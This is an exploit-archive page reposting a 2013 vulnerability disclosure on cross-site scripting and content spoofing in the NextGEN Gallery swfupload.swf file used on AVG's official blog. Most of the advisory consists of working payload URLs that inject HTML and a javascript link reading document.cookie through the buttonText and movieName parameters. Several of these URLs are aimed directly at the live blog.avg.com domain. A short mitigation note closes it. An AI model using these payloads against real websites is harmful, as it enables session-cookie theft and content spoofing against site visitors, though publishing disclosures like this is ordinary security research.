AVG Official Blog Cross Site Scripting

AVG Official Blog Cross Site Scripting: Posted Jun 7, 2013; Authored by Ryuzaki Lawlet; The AVG official blog suffers from a cross site scripting vulnerability. The author has notified AVG of the issue.; tags | exploit, xss; SHA-256 | 63bca005b71bc8e4a0bc101bcf83fed62c7bd61e1ea93aa6f7d05d71cc1c029c; Download | Favorite | View

AVG Official Blog Cross Site Scripting

#########################################################
# Title : Cross Site Scripting in AVG Official Blog
# Author : Ryuzaki Lawlet
# Blog  : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: 6/5/2013 (4.44 pm)
# Vendor: http://wordpress.org/plugins/nextgen-gallery/
# Type : Web Apps
# Vector of operation: Remote
# Impact: Cross Site Scripting & Content Spoofing
# Tested on : Ubuntu / Window XP
##########################################################

*Description:

The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.

There are two vulnerabilities in AVG Official Blog.
------->
Exploit

*Content Spoofing

http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

It's possible to inject text, images and html (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>

Code will execute after click. It's strictly social XSS.

*Proof of Concept Code

http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=[XSS]
http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swfbuttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

*Live Preview
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>


<------

Screenshot:
http://i.imgur.com/A4rKq0Q.jpg

*Solution:
On the server side, you can upgrade to a non-vulnerable version. On the client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts. 

Reff: http://justryuz.blogspot.com/2013/05/cross-site-scripting-in-avg-official.html

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 90 files
indoushka 54 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 13 files
Gentoo 11 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,087)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,608)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,726)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

AVG Official Blog Cross Site Scripting

AVG Official Blog Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AVG Official Blog Cross Site Scripting

Share This

AVG Official Blog Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems